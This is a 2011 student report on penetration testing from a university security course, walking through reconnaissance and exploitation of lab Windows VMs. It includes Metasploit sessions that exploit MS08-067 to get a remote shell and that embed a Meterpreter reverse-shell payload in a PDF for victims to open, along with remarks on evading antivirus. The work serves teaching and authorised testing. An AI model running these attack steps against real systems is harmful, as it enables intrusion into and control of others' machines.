MIEIC - SSIN (Computer Security)

MIEIC - SSIN (Computer Security)

Tom´

e Duate, Robert Kulzer

Final report

Group 5, T9

2011/2012

December 6, 2011

1

Introduction

There are numerous studies on malware development over the past decade, they all show a rapidly growth over the last years. Please refer to figure 1 for one of the malware statistics.

Figure 1: Number of Entries on the Google Safe Browsing Malware List

Many software developers do not pay much attention on possible security flaws while developing applications. A common mistake is to think security can be implemented later on as well. But writing a robust code means to start thinking about security from the beginning to the end.

2

Goals

In this project we what to create an awareness among our fellow students to write secure code by showing how software can be exploited. We want to provide knowledge on certain tools to check for vulnerabilities, starting at the network layer to the application layer.

Moreover, we want explain the value of penetration testing and its crucial value for today’s companies. We want to explain the general guidelines of a penetration tester [1].

1. Pre-engagement Interactions 2. Intelligence Gathering 3. Threat Modeling 4. Vulnerability Analysis 5. Exploitation 6. Post Exploitation 7. Reporting

As penetration tests are either conducted as Black box and/or White box tests, we want to explain and outline the differences between these two paradigms.

Furthermore, we will provide information on noteworthy web sites to get more involved in the matter. In addition to that, there is a large variety of security tools any interested student should be aware of and may want to try. All this information will be included in this work.

We intend to state the legal concerns which one has to take into account before starting a penetration test.

3

Approach

The attacked machines in this demonstration are virtual machines. It is a close to real world example without harming actual machines. All the demonstration is done along the penetration guideline introduced in section goals 2.

The first machine is a Windows XP standard installation with service pack 3 installed. The ma-chine is calledWinXPSP3. The other machine is a Windows 7 standard installation with service pack 1. This example should demonstrate, that even newer systems can be compromised. The machine is calledWin7.

In both cases the attack is in the same network as the victim, there is no Firewall, VPN, IDS, or what so ever shielding the targets.

3.1

Metasploit

Many penetration testers use security frameworks for their work. They provide a more convenient and efficient way to manage scans and vulnerabilities. Thanks to security frameworks, certain tasks can be performed much faster. Metasploit is such a framework [2], it is open-source and is used to retrieve information on vulnerabilities on targeted systems.

3.2

Other software

Armitage is a GUI to the Metasploit framework [3]

nmap is a free and open source utility for network exploration or security auditing [4]

whois stores registered users or assignees of an Internet resource (like domain name, IP address, and so on)

host a DNS lookup utility.

telnet a network protocol to connect to specified ports on a remote host

and many more ...

4

Getting in touch with the target

4.1

Pre-engagement Interactions

The Penetration Tester’s Guide [1] defines this stage as the negotiation point. Here the security engineer and a the client meet and discuss the terms of the security evaluation. The point of this contract is to define the goal of the endeavour.

Furthermore the penetration tester may decide for Black box and/or White box test. The Black box test is performed without knowledge of the internal structure/routines of the targeted system. They are mainly used to test if the specifications are implemented in the way they are

meant to be. In manners of penetration testing, this test is considered a real world example. On the contrary is the White box test, here the internals are known. Thus, the penetration tester can launch more wide scale tests against a system from the inside. This approach simulates an malicious actor from the inside, who has the authorization to access sensitive areas which are guarded by various mechanisms. The hybrid method, sometimes refereed to as Grey box testing assumes the security engineer as some knowledge on the internals, but does not have credentials to obtain higher security clearance. This level can be achieved after gathering intelligence on the targeted system, while still be at a basic user level.

According to the company policies, it may be interesting to keep the employees (also IT depart-ment) unaware of a penetration test.

Figure 2: Black and White box testing

4.2

Intelligence Gathering

In this stage the penetration tester is trying to gather as much information on the targeted system as possible. The more information he gathers, the more elaborate his attacks/results can be. Common techniques are fingerprinting on hosts, Google hacking, social engineering and so on.

The security engineer wants to identify the defence systems within the network, such as Intru-sion Detection Systems (IDS) [6], Firewalls, Honeypots [5] and such. Depending on the strategy, the penetration tester may want to be as noisy as possible to attract attention or silent to stay undetected from the radar of the defence systems. He could also try to combine those strategies to distract the defence systems from the actual attack using different IP ranges and heavy port scans. There are numerous scenarios to perform the penetration testing. The attacker may select appropriate measures depending on the given configuration of the network.

˜# nmap −sS −PN WinXPSP3

S t a r t i n g Nmap 5 . 2 1 ( h t t p : / / nmap . o r g ) Nmap s c a n r e p o r t f o r WinXPSP3

Host i s up ( 0 . 0 0 1 0 s l a t e n c y ) . Not shown : 997 c l o s e d p o r t s PORT STATE SERVICE

135/ t c p open msrpc

445/ t c p open m i c r o s o f t−ds

MAC A d d r e s s : 0 8 : 0 0 : 2 7 : 1 8 : 2 2 : B6 ( Cadmus Computer Systems ) Listing 1: Default nmap scan on single host

In a very basicnmap scan on WinXPSP3 (refer to listing 1 the output provides information on the open ports. This gives him a basic idea which services on a machine are running and have possible flaws. The option -sS uses TCP SYN as connection attempt (no actual connection is established) and-PN skips host discovery assuming host as online. These to switches provide a very basic method to stay a little bit more silent. If nmap would be used without any options, a connection would be established, hence the scanned hosts process would most certainly be aware of a connection attempt.

There are more elaborate approaches to minimize the noise. With so calledTCP idle scan the attacker can spoof a a IP address of another host in the network. Thus, he can evade detection. In order to perform this method, one has to identify hosts in the network who incremental IP ID (packet fragment identification number) enabled. The metasploit framework comes with such a scanner. The action is shown in listing 2.

msf > u s e a u x i l i a r y / s c a n n e r / i p / i p i d s e q msf a u x i l i a r y ( i p i d s e q ) > s e t RHOSTS 1 9 2 . 1 6 8 . 5 6 . 0 / 2 4 msf a u x i l i a r y ( i p i d s e q ) > s e t THREADS 50 msf a u x i l i a r y ( i p i d s e q ) > run [∗] Scanned 045 o f 256 h o s t s (017% c o m p l e t e ) [∗] Scanned 086 o f 256 h o s t s (033% c o m p l e t e ) [∗] Scanned 095 o f 256 h o s t s (037% c o m p l e t e ) [∗] 1 9 2 . 1 6 8 . 5 6 . 1 0 1 ’ s IPID s e q u e n c e c l a s s : I n c r e m e n t a l ! . . . [∗] A u x i l i a r y module e x e c u t i o n c o m p l e t e d msf a u x i l i a r y ( i p i d s e q ) > nmap −PN −s I 1 9 2 . 1 6 8 . 5 6 . 1 0 1 WinXPSP3 Listing 2: Metasploit TCP idle scan

Listing 2 shows that the host with IP address 192.168.56.101 is a valid candidate for TCP idle scan. The option-sI tells nmap that the following hostname or IP address is a so called zombie host, used for the scan.

Listing 3 shows another useful option of nmap-Ato gather more information on a target system. Not just the fingerprint of the OS running on the target, but also if there are routers in between (HOP = 1).

˜# nmap −sS −PN −A WinXPSP3

S t a r t i n g Nmap 5 . 2 1 ( h t t p : / / nmap . o r g ) a t 2011−11−12 1 8 : 5 9 WET Nmap s c a n r e p o r t f o r WinXPSP3

Host i s up ( 0 . 0 0 1 4 s l a t e n c y ) . Not shown : 997 c l o s e d p o r t s

PORT STATE SERVICE VERSION

135/ t c p open msrpc M i c r o s o f t Windows RPC 139/ t c p open n e t b i o s−s s n

MAC A d d r e s s : 0 8 : 0 0 : 2 7 : 1 8 : 2 2 : B6 ( Cadmus Computer Systems ) D e v i c e t y p e : g e n e r a l p u r p o s e Running : M i c r o s o f t Windows XP OS d e t a i l s : M i c r o s o f t Windows XP SP2 o r SP3 Network D i s t a n c e : 1 hop S e r v i c e I n f o : OS : Windows Host s c r i p t r e s u l t s :

| n b s t a t : NetBIOS name : HACKME, NetBIOS u s e r : <unknown>, NetBIOS MAC: 0 8 : 0 0 : 2 7 : 1 8 : 2 2 : b6 | smb−os−d i s c o v e r y :

| OS : Windows XP ( Windows 2000 LAN Manager ) | Name : WORKGROUP\HACKME | System t i m e : 2011−11−15 1 8 : 5 9 : 3 8 UTC+1 | smbv2−e n a b l e d : S e r v e r doesn ’ t s u p p o r t SMBv2 p r o t o c o l HOP RTT ADDRESS 1 1 . 3 8 ms 1 9 2 . 1 6 8 . 5 6 . 1 0 2 OS and S e r v i c e d e t e c t i o n p e r f o r m e d .

Listing 3: Nmap OS discovery

But there is not just nmap as a tool to gather information on the network and the hosts. Classic UNIX tools likewhois, hostandethercap, but also capable network sniffers like wireshark [7] and openVAS [8] to serve the penetration tester on gathering intelligence.

In listing 4 the whois output ofup.pt is shown. This information does at first glance not seem to be of any value to a penetration tester. But the mail server and DNS addresses could be already identified, without even making contact with any of the up.pt hosts.

These informations are especially vital, if a security engineer is to evaluate in a Black box scenario. ˜# h o s t −t mx up . pt up . pt m a i l i s h a n d l e d by 20 r e l a y 2 . up . pt . up . pt m a i l i s h a n d l e d by 10 r e l a y 1 . up . pt . ˜# w h o i s up . pt T i t u l a r / R e g i s t r a n t U n i v e r s i d a d e do P o r t o R e i t o r i a − P r a a Gomes T e i x e i r a P o r t o 4099−002 P o r t o Email : c o n t a c t o d n s u p @ r e i t . up . pt . . . . Nameserver I n f o r m a t i o n Nameserver : up . pt NS dns1 . up . pt . . . . Nameserver : dns3 . up . pt . A 1 9 3 . 1 3 7 . 3 5 . 1 0 0 Nameserver : dns4 . up . pt . A 1 9 3 . 1 3 6 . 3 7 . 1 0

. . .

Nameserver : dns3 . up . pt . AAAA 2 0 0 1 : 6 9 0 : 2 2 0 0 : b10 : : 1 0 0 Listing 4: Host and whois queries on up.pt

5

Pin-point the target system

5.1

Threat Modeling

In this stage the attacker will isolate the most promising approach. He will try to look for the most effective attack according to the given specifications made in section Pre-engagement Interactions 4.1. Here the penetration tester works as an adversary would try to penetrate the system.

The identification of vulnerabilities and security flaws in a system is not an easy task. As in the previous section 4.2 explained, the attacker has to operate cautiously.

The security engineer knows about which ports are open. Now he wants to learn more about which software uses this port and which version of this program. Listing 5 shows an example how to identify a web server software and it’s version. The output states Apache version 2.2.3, as well the server runs on Linux with the SuSE Linux distribution. This output can be cross checked with the findings from OS fingerprinting.

˜# t e l n e t www. f e . up . pt 80 T r y i n g 1 9 3 . 1 3 6 . 2 8 . 2 0 5 . . . Connected t o s i f e u p . f e . up . pt ( 1 9 3 . 1 3 6 . 2 8 . 2 0 5 ) . Escape c h a r a c t e r i s ’ ˆ ] ’ . GET / i n d e x . html HTTP/ 1 . 1 HTTP/ 1 . 1 400 Bad R eq ue st

Date : Sat , 12 Nov 2011 1 4 : 2 5 : 3 4 GMT S e r v e r : Apache / 2 . 2 . 3 ( Linux /SUSE) Content−Length : 226

C o n n e c t i o n : c l o s e

Content−Type : t e x t / html ; c h a r s e t=i s o−8859−1

Listing 5: Determine the web server version

Having this information, the attacker may proceed to web pages like www.exploit-db.com to obtain informations on recently discovered vulnerabilities in Apache version 2.2.3 or he could search with metasploit. Yet another way to discover vulnerabilities is to use nmap scripts. Nmap can also scan for certain vulnerabilities on hosts. Moreover, the nmap script engine (NSE) [10] can be easily developed by users and are publicly available.

Listing 6 shows an smb scan on a WinXPSP3. The output yields a MS08-67 vulnerability [9]. This critical flaw allows remote code execution. This attack provides the attacker to gain remote access, hence compromising the entire system.

˜# nmap −A −sS −PN WinXPSP3 −−s c r i p t=smb−check−v u l n s . . .

NSE : S c r i p t S c a n n i n g c o m p l e t e d . Nmap s c a n r e p o r t f o r WinXPSP3 Host i s up ( 0 . 0 0 1 3 s l a t e n c y ) . . . . D e v i c e t y p e : g e n e r a l p u r p o s e Running : M i c r o s o f t Windows XP OS d e t a i l s : M i c r o s o f t Windows XP SP2 o r SP3 Network D i s t a n c e : 1 hop S e r v i c e I n f o : OS : Windows Host s c r i p t r e s u l t s : | smb−check−v u l n s : | MS08−067: LIKELY VULNERABLE | C o n f i c k e r : L i k e l y CLEAN | r e g s v c DoS : CHECK DISABLED

| SMBv2 DoS (CVE−2009−3103): CHECK DISABLED Listing 6: Nmap smb vulnerability scan

5.2

Vulnerability Analysis

Is concerned with the question on how to gain access to the system. In this stage the security engineer puts his data together he gathered up to this point to develop to most effective method to execute the attack.

As for this work, we select the MS08-067 exploit, as it grants total access to the system.

6

Exploitation Process

6.1

Exploitation

After careful planing and information gathering the actual attack can be carried out. Unlike as in section Intelligence Gathering 4.2 pointed out, the attacker should proceed as silent as possible. Massive and random launches of exploits are usually not the way to go in this stage.

Listing 7 shows how easily remote access can be obtained using the metasploit framework. In this scenario the command-line version of metasploit is used.

• At first, the IPv4 address of the attackers machine is set.

• The payload is the remote code which will be executed abusing the vulnerability. In this case the payload is a remote shell listening on port 4444 on the victims machine.

• In the next step, the MS08-067 vulnerability is searched, via the search engine provided by the metasploit framework.

• After locating the right vulnerability, it’s being loaded and now the penetration tester may configure the attack further

• The available parameters can be viewed by showing the options. The required fields are marked and have to be provided.

• After setting up all the essential parameters the actual exploit can be started.

msf > s e t LHOST 1 9 2 . 1 6 8 . 5 6 . 1 <−−− A t t a c k i n g machine LHOST => 1 9 2 . 1 6 8 . 5 6 . 1 msf > s e t PAYLOAD windows / s h e l l / b i n d t c p PAYLOAD => windows / s h e l l / b i n d t c p msf > s e a r c h ms08−067 Matching Modules ================

Name D i s c l o s u r e Date Rank D e s c r i p t i o n

−−−− −−−−−−−−−− −−−−− −−−− −−−−−−−−−−− e x p l o i t / . . . / m s 0 8 0 6 7 n e t a p i 2008−10−28 g r e a t M i c r o s o f t . . . msf > u s e e x p l o i t / windows /smb/ m s 0 8 0 6 7 n e t a p i msf e x p l o i t ( m s 0 8 0 6 7 n e t a p i ) > show o p t i o n s Module o p t i o n s ( e x p l o i t / windows /smb/ m s 0 8 0 6 7 n e t a p i ) : Name C u r r e n t S e t t i n g R e q u i r e d D e s c r i p t i o n −−−− −−−−−−−−−−−−−−− −−−−−−−− −−−−−−−−−−− RHOST y e s The t a r g e t a d d r e s s RPORT 445 y e s S e t t h e SMB s e r v i c e p o r t SMBPIPE BROWSER y e s The p i p e name . . .

Payload o p t i o n s ( windows / s h e l l / b i n d t c p ) : Name C u r r e n t S e t t i n g R e q u i r e d D e s c r i p t i o n −−−− −−−−−−−−−−−−−−− −−−−−−−− −−−−−−−−−−− EXITFUNC t h r e a d y e s E x i t t e c h n i q u e : seh , . . . LPORT 4444 y e s The l i s t e n p o r t RHOST no The t a r g e t a d d r e s s E x p l o i t t a r g e t : I d Name −− −−−− 0 Automatic T a r g e t i n g msf e x p l o i t ( m s 0 8 0 6 7 n e t a p i ) > s e t RHOST WinXPSP3 RHOST => WinXPSP3

msf e x p l o i t ( m s 0 8 0 6 7 n e t a p i ) > s e t t a r g e t 6 t a r g e t => 6 msf e x p l o i t ( m s 0 8 0 6 7 n e t a p i ) > e x p l o i t [∗] S t a r t e d b i n d h a n d l e r [∗] Attempting t o t r i g g e r t h e v u l n e r a b i l i t y . . . [∗] S e n d i n g s t a g e ( 2 4 0 b y t e s ) t o WinXPSP3 [∗] Command s h e l l s e s s i o n 1 opened ( 1 9 2 . 1 6 8 . 5 6 . 1 : 3 3 0 5 0 −> WinXPSP3 : 4 4 4 4 ) a t 2011−11−12 M i c r o s o f t Windows XP [ V e r s i o n 5 . 1 . 2 6 0 0 ] (C) C o p y r i g h t 1985−2001 M i c r o s o f t Corp . C:\WINDOWS\system32>

Listing 7: Getting remote shell after MS08-067 exploit

There are of course numerous payloads to be used. One of the most intriguing one is Meterpreter [11], this payload enables the penetration tester to a wide range of tools and mechanisms to control the client. As the attacker may want to use one or more of the compromised systems as a platform for further attacks inside the network Meterpreter can be a valuable asset to keep control of the attacked systems.

6.1.1 Meterpreter

It is short for Meta-Interpreter, a advanced payload for the Metasploit framework. It provides a much easier way to richer feature set for the framework. The alternative would be much assembly code which can be very exhausting. To stay undetected, Meterpreter operates only in memory, thus staying undetected.

Figures 3 and 4 show the interface of Armitage.

6.2

Using application exploits

Nowadays, operating systems are no longer the main target of malware developers [12]. Injec-tion, XSS and miss configured session management are much more pressing topics for security engineers.

In addition to that, social engineering is still one of the most effective ways to compromise a system. Here is an example on embedding malicious code in a benign looking pdf file. When the file is opened with Adobe Reader [13] (version 8.x and 9.x) it executes the malicious code.

6.2.1 Malicious pdf

Listing 8 shows the way to create a malicious pdf file, using the Metasploit framework to embed code in a originally legitimate document.

Figure 3: Armitage interface, after scanning the network

Figure 4: Meterpreter session opened after compromising Win7

Matching Modules . . .

msf > u s e e x p l o i t / windows / f i l e f o r m a t / a d o b e p d f e m b e d d e d e x e msf . . . > s e t FILENAME <output−path>/buhu−m. p d f

FILENAME => <output−path>/buhu−m. p d f

msf . . . > s e t INFILENAME <i n p u t−path>/IPTablesFlowChart . p d f INFILENAME => <i n p u t−path>/IPTablesFlowChart . p d f

msf . . . > s e t LAUNCH MESSAGE Foobar LAUNCH MESSAGE => Foobar

msf . . . > s e t LHOST 1 9 2 . 1 6 8 . 5 6 . 1 LHOST => 1 9 2 . 1 6 8 . 5 6 . 1 msf . . . > show o p t i o n s Module o p t i o n s ( e x p l o i t / windows / f i l e f o r m a t / a d o b e p d f e m b e d d e d e x e ) : Name C u r r e n t S e t t i n g −−−− −−−−−−−−−−−−−−− EXENAME

FILENAME <output−path>/buhu−m. p d f

INFILENAME <i n p u t−path>/IPTablesFlowChart . p d f LAUNCH MESSAGE Foobar

Payload o p t i o n s ( windows / m e t e r p r e t e r / r e v e r s e t c p ) : Name C u r r e n t S e t t i n g R e q u i r e d D e s c r i p t i o n −−−− −−−−−−−−−−−−−−− −−−−−−−− −−−−−−−−−−− EXITFUNC p r o c e s s y e s E x i t t e c h n i q u e : seh , . . . LHOST 1 9 2 . 1 6 8 . 5 6 . 1 y e s The l i s t e n a d d r e s s LPORT 4444 y e s The l i s t e n p o r t . . . msf e x p l o i t ( a d o b e p d f e m b e d d e d e x e ) > e x p l o i t

[∗] Reading i n ’<i n p u t−path>/IPTablesFlowChart . pdf ’ . . . [∗] P a r s i n g ’<i n p u t−path>/IPTablesFlowChart . pdf ’ . . . [∗] P a r s i n g S u c c e s s f u l .

[∗] Using ’ windows / m e t e r p r e t e r / r e v e r s e t c p ’ a s p a y l o a d . . . [∗] C r e a t i n g ’<output−path>/buhu−m. pdf ’ f i l e . . .

[ + ] <output−path>/buhu−m. p d f . . .

Listing 8: Embedding malicious code in a pdf file using Metasploit

Thehard part of the penetration testers work is now to convince a victim to open this document in Adobe Reader, which has this vulnerability. Before the victim opens the document, the attacker have to make sure, that a connection handler is waiting for incoming connections, see listing 9.

msf e x p l o i t ( h a n d l e r ) > s e t PAYLOAD windows / m e t e r p r e t e r / r e v e r s e t c p PAYLOAD => windows / m e t e r p r e t e r / r e v e r s e t c p msf e x p l o i t ( h a n d l e r ) > s e t LHOST 1 9 2 . 1 6 8 . 5 6 . 1 LHOST => 1 9 2 . 1 6 8 . 5 6 . 1 msf e x p l o i t ( h a n d l e r ) > e x p l o i t [∗] S t a r t e d r e v e r s e h a n d l e r on 1 9 2 . 1 6 8 . 5 6 . 1 : 4 4 4 4 [∗] S t a r t i n g t h e p a y l o a d h a n d l e r . . .

Listing 9: Generate a generic listener using Metasploit

After completing these steps, the penetration tester should see the incoming connection. Please refer to figure 5 to see Meterpreter with Armitage in action.

Figure 5: Taking a screenshot from the running compromised machine

However, this is a rather simple approach. This attempt would most certainly fail, if the machine would use a virus scanner. Checking the file with the online malware scannervirustotal.com [14] turns out that most of the virus engines can identify this malicious formed pdf document. See figure 6 for the results on the pdf.

It is on the other hand not so difficult to prevent the detection by virus scan engines. Obfuscating techniques render them innocuous.

6.3

Post Exploitation

After successfully compromised one or more systems, the penetration tester wants to gather valuable information and intelligence. The security engineer wants to expose the most secure systems in the network, the organization is trying to protect the most. In a software company

Figure 6: Virustotal scan on the embedded Meterpreter pdf document.

this may be there repository. A bank tries to shield of their financial services. These are the systems the penetration tester is after.

As it may be easier to compromise a insignificant host first, the penetration tester may use this machine then to continue for more protected systems. Here Metasploit, or more precisely Meterpreter provides options to stay on attacked machines, by for example switching the process used for attack to a other one, to stay undetected.

7

Reporting

The organization who hires penetration testers expect them to reveal vulnerabilities in their networks and how they can be exploited. Hence, this stage is one of the most important. It is not just the wholes in the security systems a penetration testers uncovers, but he is also

supposed to rise the awareness of the flaws in their configuration, to hinder upcoming attacks. The security engineer will also provide solutions to the discovered vulnerabilities, and if possible to eliminate them on a broader scale. For example, if SQL injections are possible, the input for these instances should be sanitized. But the the underlining problem still remains. He may also show alternatives, if possible to eliminate this problem in total.

As for the examples in this work. Most of the vulnerabilities are caused because of outdated applications. These security wholes can be closed rather easily. But there still are numerous possibilities to find entrance to a considered secure environment.

8

Conclusion

Even though nowadays many companies and governments invest more money in their IT security departments, the number of news regarding compromised databases, industrial espionage and so on is still rising. Organized crime discovered the huge potential profit in online crime. But also crash kids (aka. script kiddies) and self assigned freedom fighters are a threat for data each one of us wants to protect.

Penetration tests can be one instrument to unveil security flaws in networks and systems. These security engineer operate as they were hackers, but they have permission from the organization who hired them. It is most certainly not the magic formula to prevent future attacks. But it rises the level, an attacker would have to surpass, in order to gain access. Professional attackers have a business plan as well as companies. If the amount of resources invested is higher then the expected profit, they most likely will reconsider their attack plans. Hackers how attack for fun or prestige, will also spend more of their time breaking into these systems, previously tested by penetration testers. Furthermore, penetration testers can help rise awareness for vulnerabilities in software but also in social engineering.

References

[1] David Kennedy, Jim O’Gorman, Devon Kearns, and Mati Aharoni

Metasploit - The Penetration Tester’s Guide. ISBN: 978-1-59327-288-3 [2] Rapid7 LLC

Metasploit Framework.http://www.metasploit.com/ [3] Raphael Mudge

Cyber attack management for metasploit.http://www.fastandeasyhacking.com/ [4] Gordon Lyon

nmap - Discovering hosts and services on a computer network.http://nmap.org/ [5] Provos, N.

A virtual honeypot framework. Proceedings of the 13th conference on USENIX Security Symposium-Volume 13 (2004)

[6] Rowland, C.H.

Intrusion detection system (IDS). US Patent 6,405,318 [7] The Wireshark team

Wireshark - The free and open-source packet analyzer.http://www.wireshark.org/ [8] Greenbone Networks GMBH

OpenVAS - Framework for vulnerability scanning.http://www.openvas.org/ [9] MS08-067 vulnerability

Vulnerability in Server Service Could Allow Remote Code Execution. http://technet.microsoft.com/en-us/security/bulletin/ms08-067 [10] Various developers, initially by nmap developers

Nmap scripts to automate a wide variety of networking tasks. http://nmap.org/book/nse.html

[11] Metasploit developers

Meterpreter - Advanced payloads for Metasploit Framework.

http://www.offensive-security.com/metasploit-unleashed/Metasploit_About_ Meterpreter

[12] Open Web Application Security Project (OWASP)

OWASP is an open-source application security project.

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project [13] Adobe Systems

Adobe Reader - Used to view and print PDF files. http://www.adobe.com/products/reader.html [14] Virustotal.com - Hispasec Sistemas

Free checking of suspicious files using multiple antivirus engines. http://www.virustotal.com/